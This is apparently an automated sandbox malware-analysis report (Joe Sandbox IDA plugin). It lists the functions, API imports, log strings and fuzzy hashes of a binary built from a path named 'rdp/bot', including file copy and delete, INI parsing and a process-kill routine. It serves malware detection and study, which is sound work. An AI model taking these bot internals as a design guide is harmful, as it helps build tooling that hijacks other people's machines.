GetFileTime.KERNEL32 ref: 00007FF764CC5CBE
GetLastError.KERNEL32 ref: 00007FF764CC5CCC
CloseHandle.KERNEL32 ref: 00007FF764CC5DEE

Strings

fs_file_stat, xrefs: 00007FF764CC5D07, 00007FF764CC5D3A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC5CF9, 00007FF764CC5D2C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC5D0E, 00007FF764CC5D41
(path != NULL), xrefs: 00007FF764CC5D00
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF764CC5D33

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: 7d329871a1d9df9c714f38f2d1b57bc2c9dca41de0c0c3b0928d58f10eb66f42
Instruction ID: 4e615c16574e6c4d2663bf81c3e71d89378cbbff13ed748755cda2dbac57d2de
Opcode Fuzzy Hash: 7d329871a1d9df9c714f38f2d1b57bc2c9dca41de0c0c3b0928d58f10eb66f42
Instruction Fuzzy Hash: 61516F61E0C222C2FB307F1296C8379D291AF007A8F986237D91D5B7D5DE6DAC45CB61

Function 00007FF764CCA264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF764CCA300
_strtoui64.MSVCRT ref: 00007FF764CCA316
_errno.MSVCRT ref: 00007FF764CCA320
_errno.MSVCRT ref: 00007FF764CCA32C

Strings

ini_get_uint64, xrefs: 00007FF764CCA2DF, 00007FF764CCA34C
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF764CCA353
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CCA2D1
(value != NULL), xrefs: 00007FF764CCA2D8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CCA2E6

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: a18c6c83516754f6b857dd7fe20c6f15bd4307d0d919e2e26326aedb1b51f943
Instruction ID: 83813b65f0f49d12102fe2ad8e7d6480d7f717ccf21e9fdcf181dc21bfd9e608
Opcode Fuzzy Hash: a18c6c83516754f6b857dd7fe20c6f15bd4307d0d919e2e26326aedb1b51f943
Instruction Fuzzy Hash: EA219122608A46D6E721AF56F8807BAB361FB84784F845037EE4C47754DF3DE885CB20

Function 00007FF764CCA824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF764CCA8CD
VirtualProtect.KERNEL32 ref: 00007FF764CCA935
GetLastError.KERNEL32 ref: 00007FF764CCA93F

Strings

Address %p has no image-section, xrefs: 00007FF764CCA885
VirtualProtect failed with code 0x%x, xrefs: 00007FF764CCA945
Mingw-w64 runtime failure:, xrefs: 00007FF764CCA7EB
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF764CCA8E2
Unknown pseudo relocation protocol version %d., xrefs: 00007FF764CCA829

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction ID: 7bdb82804125e8d49b6926814e037f3a46a24e2ac93f32473d513f07aa5afc5e
Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction Fuzzy Hash: 7B318F71B09A02C6EE10AF17E8C5279A7A1FB98B94F849136DD0C473A4DE3EE446CB50

Function 00007FF764CC9F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF764CCA00E
_errno.MSVCRT ref: 00007FF764CCA02C
_errno.MSVCRT ref: 00007FF764CCA034

Strings

[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF764CCA05C
ini_get_uint16, xrefs: 00007FF764CC9FED, 00007FF764CCA055
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CC9FDF
(value != NULL), xrefs: 00007FF764CC9FE6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC9FF4

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1991603811
Opcode ID: e7187c9a11c645367552c642aa7f2f5f2e0bf4b76542b37ff506af664c279139
Instruction ID: e85db5e5b436aeb5afb4275871271ece685d23dbf2169778c071fc5bd2dd33df
Opcode Fuzzy Hash: e7187c9a11c645367552c642aa7f2f5f2e0bf4b76542b37ff506af664c279139
Instruction Fuzzy Hash: 9D216221A08647D2E721AF17E980BAAB760FB45788F945137EE4C47764DF3CE845CB10

Function 00007FF764CC255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF764CC2487
strcmp.MSVCRT ref: 00007FF764CC24CA
OpenProcess.KERNEL32 ref: 00007FF764CC24E2
TerminateProcess.KERNEL32 ref: 00007FF764CC24FC
GetLastError.KERNEL32 ref: 00007FF764CC250A
Process32Next.KERNEL32 ref: 00007FF764CC26F5
GetLastError.KERNEL32 ref: 00007FF764CC2704
CloseHandle.KERNEL32 ref: 00007FF764CC2895

Strings

, xrefs: 00007FF764CC253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF764CC251C
process_kill, xrefs: 00007FF764CC2515

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 35c2247d9284a21acdfb19c25fbd791187a1e68ef57c37c9b76c6c1b040fd45c
Instruction ID: 2c9cf49c905ce1e328979518363713966c308af7e04928a8ae79c2c01a7b0aa2
Opcode Fuzzy Hash: 35c2247d9284a21acdfb19c25fbd791187a1e68ef57c37c9b76c6c1b040fd45c
Instruction Fuzzy Hash: 40115615E09703C2FE74BF57A4E03BAA691AF45785F84703BCC4E46395EE6EE845CA20

Function 00007FF764CC2471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF764CC2487
strcmp.MSVCRT ref: 00007FF764CC24CA
OpenProcess.KERNEL32 ref: 00007FF764CC24E2
TerminateProcess.KERNEL32 ref: 00007FF764CC24FC
GetLastError.KERNEL32 ref: 00007FF764CC250A
Process32Next.KERNEL32 ref: 00007FF764CC26F5
GetLastError.KERNEL32 ref: 00007FF764CC2704
CloseHandle.KERNEL32 ref: 00007FF764CC2895

Strings

, xrefs: 00007FF764CC253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF764CC251C
process_kill, xrefs: 00007FF764CC2515

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 2079d633573d248d1c709dc4b8974b407ef0d37a5f2afb356190c5b70f397a6d
Instruction ID: e380d13d4c510fb0df49c9d57c1a26de9303c8c5fa2117e58f3cf6317d82a216
Opcode Fuzzy Hash: 2079d633573d248d1c709dc4b8974b407ef0d37a5f2afb356190c5b70f397a6d
Instruction Fuzzy Hash: F7115915E09603C2FE74BF57A4E03BAA691AF45785F843037CC0E46395EE6DE845CA20

Function 00007FF764CC246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF764CC2487
strcmp.MSVCRT ref: 00007FF764CC24CA
OpenProcess.KERNEL32 ref: 00007FF764CC24E2
TerminateProcess.KERNEL32 ref: 00007FF764CC24FC
GetLastError.KERNEL32 ref: 00007FF764CC250A
Process32Next.KERNEL32 ref: 00007FF764CC26F5
GetLastError.KERNEL32 ref: 00007FF764CC2704
CloseHandle.KERNEL32 ref: 00007FF764CC2895

Strings

, xrefs: 00007FF764CC253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF764CC251C
process_kill, xrefs: 00007FF764CC2515

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 19f042045840d5d3eb36ed95b06cd52f256d5f133c4c7940f7f514fe41e03903
Instruction ID: 6a2c8faa9014bc144bec5bbb40c0c77b09649269a7f8e083fddcaf864a657dce
Opcode Fuzzy Hash: 19f042045840d5d3eb36ed95b06cd52f256d5f133c4c7940f7f514fe41e03903
Instruction Fuzzy Hash: 07115615E09703C2FE74BF57A4E02BAA691AF45785F84303BCC0E06395EE6EE845CA20

Function 00007FF764CC2463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF764CC2487
strcmp.MSVCRT ref: 00007FF764CC24CA
OpenProcess.KERNEL32 ref: 00007FF764CC24E2
TerminateProcess.KERNEL32 ref: 00007FF764CC24FC
GetLastError.KERNEL32 ref: 00007FF764CC250A
Process32Next.KERNEL32 ref: 00007FF764CC26F5
GetLastError.KERNEL32 ref: 00007FF764CC2704
CloseHandle.KERNEL32 ref: 00007FF764CC2895

Strings

, xrefs: 00007FF764CC253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF764CC251C
process_kill, xrefs: 00007FF764CC2515

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: e928bc0f590e2b4450bf1618627d5d7b38f507986b0e6c1c84d8edb77f257348
Instruction ID: 869b63d113741f7dd43a7c6ebdbfa47e39c525008781f3f5b6be0860adbf0e55
Opcode Fuzzy Hash: e928bc0f590e2b4450bf1618627d5d7b38f507986b0e6c1c84d8edb77f257348
Instruction Fuzzy Hash: 92115615E09603C2FE74BF57A4E02BAA691EF45785F84303BCC0E06395EE6EE845CA21

Function 00007FF764CC5189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF764CC5227
GetLastError.KERNEL32 ref: 00007FF764CC5242

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Strings

[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF764CC51FD
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF764CC5260
fs_file_copy, xrefs: 00007FF764CC51F6, 00007FF764CC5259, 00007FF764CC53A7
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF764CC53AE
NULL, xrefs: 00007FF764CC5385, 00007FF764CC5391

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: f9ac9bf883ef43ce182d0056e60772d072f58fc179424d896cf5537b7f0e4c98
Instruction ID: c376304e46b729a5f1aeaafb6993537a98a551bbc86a63cdd74c9820fd47eee1
Opcode Fuzzy Hash: f9ac9bf883ef43ce182d0056e60772d072f58fc179424d896cf5537b7f0e4c98
Instruction Fuzzy Hash: 4F417195D1D627C1FA346F07A884379EA507F04BCCED82133C90F467A4EEACA681CB21

Function 00007FF764CC4BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FF764CC4BD4
GetLastError.KERNEL32 ref: 00007FF764CC4C2B

Strings

fs_file_delete, xrefs: 00007FF764CC4C0D, 00007FF764CC4C39, 00007FF764CC4D69
[I] (%s) -> Done(path=%s), xrefs: 00007FF764CC4D70
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF764CC4C40
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4C14
NULL, xrefs: 00007FF764CC4D5A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 0a88ac8f070a3a9d57df25c5a9cf07c1e47b3266f286fd42d7bcd3b5c35bbf09
Instruction ID: c89e835562d34dba828033f7df89c111d4a1e482c7fbdc358896f44b46f94062
Opcode Fuzzy Hash: 0a88ac8f070a3a9d57df25c5a9cf07c1e47b3266f286fd42d7bcd3b5c35bbf09
Instruction Fuzzy Hash: DF313A55E0CA0BD2FA30BF0BE8D07B8A2514F81345ED5A533C91E073A1ED1CA885CB2A

Function 00007FF764CC749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC74D6
strlen.MSVCRT ref: 00007FF764CC74E1

Strings

((match == NULL) || (match_len != NULL)), xrefs: 00007FF764CC757E
str_match, xrefs: 00007FF764CC7513, 00007FF764CC754C, 00007FF764CC7585
(needle != NULL), xrefs: 00007FF764CC750C
(pattern != NULL), xrefs: 00007FF764CC7545
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC751A, 00007FF764CC7553, 00007FF764CC758C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF764CC7505, 00007FF764CC753E, 00007FF764CC7577

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: 834ad89fd81bb6f12e6f2cf6b87fba45b986254a69fb60778864facdba06d0bd
Instruction ID: 8e3ce6b0bac65e6bf0edf5386b6c76b13c6d237a6029616a45abc02fc2f62ca2
Opcode Fuzzy Hash: 834ad89fd81bb6f12e6f2cf6b87fba45b986254a69fb60778864facdba06d0bd
Instruction Fuzzy Hash: 4651D191B0A593D5FE31BF1BA9907B59A50BF11788FD46033DA0E0B395DE2CE941EB20

Function 00007FF764CC6C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC6D12
strlen.MSVCRT ref: 00007FF764CC6D2E
strcat.MSVCRT ref: 00007FF764CC6D3D
strlen.MSVCRT ref: 00007FF764CC6D48

Strings

(file_path != NULL), xrefs: 00007FF764CC6CEE
fs_module_file, xrefs: 00007FF764CC6CF5
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC6CE7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC6CFC

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-2423714266
Opcode ID: 002a1bd5d54c3b6586b8a644116e7917ca091c793a1457080aefde52a79dcf43
Instruction ID: ab2c7d35b6f6475aa7996b3b32001c2e5087fdb0bd48c4d044e6baf138440801
Opcode Fuzzy Hash: 002a1bd5d54c3b6586b8a644116e7917ca091c793a1457080aefde52a79dcf43
Instruction Fuzzy Hash: AE11B161B08A53C4FE217F2B9A903B9D6915F12788FCC6132DE4D0B386EE2CD401C760

Function 00007FF764CCCACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF764CCCB20
fwprintf.MSVCRT ref: 00007FF764CCCB34
strlen.MSVCRT ref: 00007FF764CCCB9A

Strings

%.*S, xrefs: 00007FF764CCCB2D
%-*.*S, xrefs: 00007FF764CCCB19
%*.*S, xrefs: 00007FF764CCCB10

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fwprintf$strlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 2636243462-2115465065
Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction ID: e85d51f045a17cb778953c5c00440ae6a912a5c112654deafa770443f2b9edfa
Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
